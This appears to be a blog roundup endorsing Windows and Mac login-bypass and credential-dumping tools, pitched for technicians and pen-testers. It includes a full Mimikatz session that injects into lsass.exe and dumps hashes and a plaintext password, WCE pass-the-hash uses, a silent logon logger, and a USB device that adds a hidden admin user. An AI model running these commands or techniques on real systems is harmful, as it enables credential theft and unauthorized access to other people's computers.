Kon-Boot is an application which bypasses the authentication process of Windows and Mac based operating systems. This Kon-Boot version works with both 64-bit and 32-bit Microsoft Windows up to version 10 and Mac OSX Mavericks. Works from a Cd, floppy, or USB. Also supports UEFI based systems.

It also includes special feature which gives you a command prompt with system level privileges at the login screen. Easy to use and excellent for tech repairs, data recovery and security audits. They offer personal and professional licences and well worth the cost. Buy your copy today!

Offline NT Password & Registry Editor, finally got an update last month after a 4 yr hiatus. The new version of this awesome bootdisk includes support for Win8.1 and a working ‘promote user to admin’ feature among other fixes and driver updates.

2 new commandline functions are:
samusrgrp: a command line tool to add users to groups or remove users from groups. Users and groups must be local (cannot be domain / AD). It can also list the groups with their members in several forms, the output can be used in scripts of course. Listing groups will also list domain users that are members of the group (if any), but it will not be able to look up the name, so it will be listed as a SID only.

sampasswd: Password reset from command line (scriptable) Or list users in SAM file in a few different formats.

More information on these new tools ::here::
The bootdisk can be ran from a floppy,CD, or USB and can be Download from http://pogostick.net/~pnh/ntpasswd/

The best password bypass program out there has been updated. A few bug fixes and support for Windows 8.1. A must have for any computer technician. I use the product almost daily @ my shop. Whenever a customer drops off a Windows computer and doesn’t know their wife’s/kid’s/gf’s password, or I’m doing on-site work and Mary the secretary is on her lunch break and I need to update her locked computer, this is my goto program. It’s better than a password reset because along with that you also destroy other saved passwords for internet explorer, google products, etc that all use the CryptProtectData function along with your logon password to encrypt data.

Watch the video to see how easy it is to use.

And best of all is the price: $15 for personal license & $75 for Commercial license. The time it saves is definitely worth it 10x over.
More information can be found ::HERE::

p.s they also have an Apple Mac version too.

Microsoft GINA technology which stands for Graphical Identification ‘N Authentication is responsible for graphically handling logon requests when events such as CTRL-ALT-DEL are received. Tyler Wrightson finally released his modified GINA stub that silently logs usernames and domains for XP and Win2k. You can dpwnload it ::here::. More information about how GINA works can be found in his excellent blog post.

This will not work for Vista and later Operating Systems, as they have switched to the Credential Provider model. Microsoft claims the reasoning behind this is to make it easier for developers to meet the demands for next generation authentication technologies (like biometrics, two factor and single sign on). Have no fear he also released a version for Vista/7 ::here::. More information can be found in his blog post.

What’s new in version V2.1?
– Windows 8 support (only standard BIOS, no EFI support)
– Sticky keys feature (allows user to spawn a console window with system admin rights before the user is logged in)

src: http://www.thelead82.com/kon-boot/

Sometimes when you can’t enter the BIOS because there is a password, but you can still boot into windows, you can try to use CMOS De-Animator to clear the BIOS settings. Works on both 32 and 64 bit. In the event that it doesn’t work try to use our BIOS password recovery service. CMOS De-Animator can be downloaded from the author’s website ::HERE::

As you’ve seen in our previous post about WCE, Windows is storing your password to use for wdigest authentication. Your System needs cleartext passwords for Single Sign On with Terminal Server (tspkg provider) and Windows Digest implementation (wdigest provider). Password are not in cleartext in memory, but with the need to have them in plaintext form for SSO, they are cypher in reversible way. wdigest (the password) is required to support HTTP Digest Authentication and other schemes that require the authenticating party to know the password – and not just the hash. Mimikatz is a tool to recover this plain-text password,it saves you time and power needed to brute force a 16 character NTLM password during pen-testing or tech work. You inject a dll into lsass.exe to recover the information needed. The blog and program are in French http://blog.gentilkiwi.com/mimikatz

Below is a demonstration of how to use mimikatz, all commands typed are in red:
(The privilege::debug command is not required if you are already system.)

C:\Mimikatz\x64>mimikatz
mimikatz 1.0 x64 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:49:24) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d’ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 568
Attente de connexion du client…
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécurités dans LSASS

mimikatz # @getLogonPasswords

Authentification Id         : 0;160179
Package d’authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d’authentification  : TestBox64
        msv1_0 :        lm{ d0e9aee149655a6075e4540af1f22d3b },
ntlm{ cc36cf7a8514893efccd332446158b1a }
        wdigest :       waza1234/
        tspkg :         waza1234/

Windows Credentials Editor (WCE) allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes and Kerberos tickets). This can be used, for example, to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be used to perform further attacks, obtain Kerberos tickets and reuse them in other Windows or Unix systems. Also dumps passwords in plain-text without the need to crack the hashes. Supports Windows XP, 2003, Vista, 7 and 2008.

Current Version: WCE v1.3beta (32-bit) (download) – WCE v1.3beta (64-bit) (download)

Frequently Asked Questions (FAQ) available here.

Programmable embedded devices have the capability of being detected as a HID device , just like a keyboard or mouse. So if you have physical access and a minute alone you can compromise a system with something the size of your thumb. The possibilities are endless, HTTP/FTP download, injecting binaries into debug or Powershell etc.. Also this device is cross platform which means Windows,Linux,UNIX and Apple are all vulnerable.

Here’s an example project we made for a Windows7 box that adds a new Admin user to the system and hides that user from the logon screen. the whole process takes about 16 seconds , with most of the time taken by the device being detected as a keyboard and the driver installed. The device costs about $20 and can be found here